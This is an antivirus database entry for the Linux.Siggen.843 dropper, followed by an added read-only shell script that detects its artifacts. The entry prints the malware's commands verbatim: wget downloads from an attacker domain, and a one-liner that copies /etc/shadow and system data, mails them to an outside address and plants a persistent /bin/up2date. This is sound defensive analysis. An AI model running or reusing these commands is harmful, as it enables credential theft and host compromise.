Linux.Siggen.843
Added to the Dr.Web virus database: 2018-08-15
Virus description added: 2018-08-15
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/rc.d/init.d/sendmail
Malicious functions:
Gains root privileges
Launches processes:
- sh -c wget www.r3dstorm.com/toolkit/tOOlz.tgz
- wget www.r3dstorm.com/toolkit/tOOlz.tgz
- sh -c wget www.r3dstorm.com/toolkit/hate.you
- wget www.r3dstorm.com/toolkit/hate.you
- sh -c wget www.r3dstorm.com/toolkit/love.you
- wget www.r3dstorm.com/toolkit/love.you
- sh -c wget www.r3dstorm.com/toolkit/daily
- wget www.r3dstorm.com/toolkit/daily
- sh -c wget www.r3dstorm.com/toolkit/mclean
- wget www.r3dstorm.com/toolkit/mclean
- sh -c wget www.r3dstorm.com/toolkit/see_all
- wget www.r3dstorm.com/toolkit/see_all
- sh -c wget www.r3dstorm.com/toolkit/up2date
- wget www.r3dstorm.com/toolkit/up2date
- sh -c wget www.r3dstorm.com/toolkit/day
- wget www.r3dstorm.com/toolkit/day
- sh -c wget www.r3dstorm.com/toolkit/READ.1st
- wget www.r3dstorm.com/toolkit/READ.1st
- sh -c wget www.r3dstorm.com/toolkit/lynx.tgz
- wget www.r3dstorm.com/toolkit/lynx.tgz
- sh -c PATH="/bin:/sbin";export PATH;cat /etc/*-release > /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;cat /etc/passwd >> /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;cat /etc/shadow >> /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;ping -c 4 www.yahoo.com >> /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;route >> /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;ifconfig >> /tmp/.rdn 2>/dev/null;echo === >> /tmp/.rdn;hostname -i >> /tmp/.rdn 2>/dev/null;echo == >> /tmp/.rdn;uname -a >> /tmp/.rdn 2>/dev/null;echo == >> /tmp/.rdn;mail -s TooLKiTo2 dezde@mymail.ro < /tmp/.rdn 2>/dev/null;rm -rf /tmp/.rdn 2>/dev/null;mv -f up2date /bin/up2date 2> /dev/null;/bin/up2date 2> /dev/null;echo "/bin/up2date 2>/dev/null" >> /etc/rc.d/init.d/sendmail 2>/dev/null
- cat /etc/os-release
- cat /etc/passwd
- cat /etc/shadow
- ping -c 4 www.yahoo.com
- route
- ifconfig
- hostname -i
- uname -a
- rm -rf /tmp/.rdn
- mv -f up2date /bin/up2date
- /bin/up2date
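The command list above gives the dropper's host footprint: a recon dump staged in /tmp/.rdn and mailed out, the kit moved to /bin/up2date, and a line appended to /etc/rc.d/init.d/sendmail so the binary starts with the service. The following POSIX shell check is an added example, not code from the Dr.Web entry or from the malware itself. It looks for those artifacts under a root path (/ on a live host, or the mount point of a forensic image) and reports a hit count. The download directories it searches (/tmp, /var/tmp, /root) are assumptions, since wget saves into the caller's working directory and the entry does not name it; the sample tree it builds for a self-test is constructed, not a real infection.

```shell
#!/bin/sh
# Added example (not Dr.Web's or the malware's code): read-only host check
# for the artifacts listed in the Linux.Siggen.843 entry. Prints one "HIT:"
# line per finding on stderr and the total count on stdout.

# File names fetched by the dropper, taken from the "Launches processes" list.
TOOLKIT_NAMES="tOOlz.tgz hate.you love.you daily mclean see_all up2date day READ.1st lynx.tgz"

check_siggen843() {
  root="${1:-/}"
  hits=0

  # 1. Persistence: the dropper appends "/bin/up2date 2>/dev/null" to the
  #    sendmail init script. grep without an anchor so a missing trailing
  #    newline in the original script does not hide the appended line.
  init="$root/etc/rc.d/init.d/sendmail"
  if [ -f "$init" ] && grep -q '/bin/up2date' "$init"; then
    echo "HIT: $init launches /bin/up2date" >&2
    hits=$((hits + 1))
  fi

  # 2. Dropped binary: the kit is moved to /bin/up2date. Assumption: no stock
  #    package installs a file at that exact path, so any file there is suspect.
  if [ -e "$root/bin/up2date" ]; then
    echo "HIT: $root/bin/up2date exists" >&2
    hits=$((hits + 1))
  fi

  # 3. Recon staging file. The dropper removes it with rm -rf after mailing it,
  #    so its presence means the script is running now or was interrupted.
  if [ -e "$root/tmp/.rdn" ]; then
    echo "HIT: $root/tmp/.rdn present" >&2
    hits=$((hits + 1))
  fi

  # 4. Toolkit files left in the download directory. wget writes into the
  #    working directory, which the entry does not name; these three are
  #    assumed starting points.
  for name in $TOOLKIT_NAMES; do
    for dir in "$root/tmp" "$root/var/tmp" "$root/root"; do
      if [ -f "$dir/$name" ]; then
        echo "HIT: toolkit file $dir/$name" >&2
        hits=$((hits + 1))
      fi
    done
  done

  echo "$hits"
}

# Constructed sample tree mimicking the post-infection layout (not a real
# infection): the appended init-script line, the relocated binary, the staging
# file and one toolkit archive in /tmp. Used for a self-test below.
build_sample_tree() {
  base=$(mktemp -d)
  mkdir -p "$base/etc/rc.d/init.d" "$base/bin" "$base/tmp"
  printf '#!/bin/sh\n# chkconfig: 2345 80 30\n/bin/up2date 2>/dev/null\n' \
    > "$base/etc/rc.d/init.d/sendmail"
  : > "$base/bin/up2date"
  : > "$base/tmp/.rdn"
  : > "$base/tmp/tOOlz.tgz"
  echo "$base"
}

# Self-test against the constructed tree; run check_siggen843 / or
# check_siggen843 /mnt/image for a real host or image.
sample=$(build_sample_tree)
check_siggen843 "$sample"
rm -rf "$sample"
```

Point the function at an image mount rather than / when the host is still live, since the init-script edit and the /bin drop were done as root and a running up2date could tamper with what the shell sees.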
Performs operations with the file system:
Creates or modifies files:
Deletes files:
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
- 87.###.98.8:1025
DNS ASK:
- ww#.##dstorm.com
- ww#.#ahoo.com
- 8.##.###.87.in-addr.arpa
- 1.###.##8.192.in-addr.arpa
Sends data to the following servers:
Curing recommendations
Linux